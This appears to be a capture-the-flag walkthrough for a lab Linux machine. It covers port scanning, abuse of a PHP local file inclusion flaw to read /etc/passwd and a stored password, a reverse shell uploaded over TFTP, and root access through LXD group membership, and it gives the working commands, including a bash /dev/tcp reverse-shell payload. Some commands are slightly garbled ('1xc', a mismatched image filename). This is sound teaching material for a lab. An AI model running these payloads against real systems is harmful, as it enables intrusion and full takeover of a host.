MACHINE - INCLUDED

IP: 10.129.243.253

Type: Linux

OPEN PORTS

```
• [1] 80/tcp http Apache httpd 2.4.29

|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://10.129.95.185/?file=home.php
```

ACCESSING THE SITE

 $$ nmap -sVC -T4 -Pn -p- {IP}$

- Above we notice that the requested resource comes with a GET parameter file
- This is a common practice when dynamically load pages in the site

```
if ($_GET['file']) {
    include($_GET['file']);
} else {
    header("Location: http://$_SERVER[HTTP_HOST]/index.php?file=home.php");
}
```

- If not programmed correctly it can lead to vulnerabilities and attack vectors
- In this case it was not programmed correctly ...
- This type of vulnerability is called *Local File Inclusion* (LFI)

Local file inclusion (also known as LFI) is the process of including files, that are already locally present on the server, through the exploitation of vulnerable inclusion procedures implemented in an application.

```
$ curl -X GET http://{IP}/?file=/etc/passwd
root:x:0:0:root:/root:/bin/bash
```

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```
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:1p:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
mike:x:1000:1000:mike:/home/mike:/bin/bash
tftp:x:110:113:tftp daemon,,,:/var/lib/tftpboot:/usr/sbin/nologin
```

- First of all, we see that there is a user named mike
- Let's see if we can get the flag of the user

```
$ curl -X GET http://{IP}/?file=/home/mike/user.txt
<Empty Result>
```

- Unfortunately either we cannot access the file, or it does not exists
- Also other names could be tried

```
$ curl -X GET http://{IP}/?file=/home/mike/flag.txt

<Empty Result>
$ curl -X GET http://{IP}/?file=/home/mike/mike.txt

<Empty Result>
```

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• We also see another interesting user, named tftp

TFTP

Trivial File Transfer Protocol (TFTP) is a simple protocol that provides basic file transfer function with no user authentication. TFTP is intended for applications that do not need the sophisticated interactions that File Transfer Protocol (FTP) provides. It works over UDP, which is lightweight and unsecure. The default port is 69/UDP

Let's see if the service is up and running using NMAP

```
$ sudo nmap -sU -T3 -p69 {IP}

PORT STATE SERVICE
69/udp open|filtered tftp
```

• Now that we are sure that the service is up we can try to access it

put send file get receive file quit exit tftp

verbose toggle verbose mode trace toggle packet tracing

literal toggle literal mode, ignore ':' in file name

status show current status binary set mode to octet ascii set mode to netascii

rexmt set per-packet transmission timeout timeout set total retransmission timeout

print help information
help print help information

- However, there is no command for listing directories
- From the /etc/passwd we only know that files are stored in /var/lib/tftpboot/

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SOME MORE INFORMATIONS

• Let's enumerate the directories of the site

```
$ gobuster -u http://{IP}/ -w /usr/share/wordlists/dirb/common.txt
/.hta
                      (Status: 403) [Size: 278]
/.htpasswd
                      (Status: 403) [Size: 278]
/.htaccess
                      (Status: 403) [Size: 278]
/fonts
                      (Status: 301) [Size: 314]
                      (Status: 301) [Size: 315]
/images
/index.php
                      (Status: 301) [Size: 308]
/server-status
                     (Status: 403) [Size: 278]
Progress: 4614 / 4615 (99.98%)
```

Leveraging LFI vulnerability

```
$ curl -X GET http://{IP}/?file=.htpasswd
mike:Sheffield19
```

- Now we have a username and a password stored in clear text
- Still there is no remote shell service we can use
- Until now we know:
- 1. There is a user named mike with password Sheffield19
- 2. The TFTP service is up and running, with default folder /var/lib/tftpboot/
- 3. The page is vulnerable to LFI
- Let's get more info on the user ... I guess, its group

```
$ curl -X GET http://{IP}/?file=/etc/group | grep mike
lxd:x:108:mike
mike:x:1000:
```

- The user mike belongs to the 1xd group
- The user mike does not belong to the sudoers group

LXD (pronounced lex-dee) is the lightervisor, or lightweight container hypervisor. LXC (lex-see) is a program which creates and administers "containers" on a local system. It also provides an API to allow higher level managers, such as LXD, to administer containers.

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GETTING A REVERSE SHELL

- Let's exploit all these vulnerabilities
- Write a simple PHP script for the reverse shell

```
<?php system("/bin/bash -c 'exec bash -i &>/dev/tcp/{MyIP}/{remote-port} <&1'"); ?>
```

Use TFTP to load it into the system

```
$ tftp {IP} -c put script.php
```

On another shell start a netcat listener

```
$ nc -lnvp {remote-port}
```

• Launch the exploit

```
$ curl -X GET http://{IP}/?file=/var/lib/tftpboot/script.php
```

• Once we have obtained the shell, we can become user mike with

```
www-data@included:/home/mike$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@included:/home/mike$ export TERM=xterm
www-data@included:/home/mike$ su mike
Password: Sheffield19
mike@included:~$ cat user.txt
```

- At this point we need to become root user
- We can use lateral movement exploiting the fact that mike belongs to LXD group

LINUX PRIVESC WITH LXD

- The idea is to:
- 1. Start a container with root privileges
- 2. Mount the entire host filesystem in the container
- 3. Obtain a shell inside the container and get the flag

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• First of all, in our local machine let's download the apline image

```
$ git clone https://github.com/saghul/lxd-alpine-builder.git
$ cd lxd-alpine-builder
$ sudo ./build-alpine
$ ls
alpine-v3.13-x86_64-20210218_0139.tar.gz
$ python3 -m http.server
```

- The last command host an HTTP server on our local machine
- In this way we can download the TAR archive from the victim machine
- On the victim machine we need to given these commands

```
mike@included:~$ wget http://{MyIP}:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
mike@included:~$ lxd init
mike@included:~$ lxc image import ./alpine-v3.10-x86_64-20191008_1227.tar.gz --alias myimage
mike@included:~$ lxc image list
+-----
ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE |
+-----
| myimage | cd73881adaac | no
                        | alpine v3.13 (20210218 01:39) | x86 64 | 3.11MB |
+-----
mike@included:~$ 1xc init myimage ignite -c security.privileged=true
mike@included:~$ lxc config device add ignite mydevice disk source=/ path=/mnt/ recursive=true
mike@included:~$ lxc start ignite
mike@included:~$ lxc exec ignite /bin/sh
~# id
uid=0(root) gid=0(root)
~# cd /mnt/root/
/mnt/root# ls
root.txt
/mnt/root# cat root.txt
```

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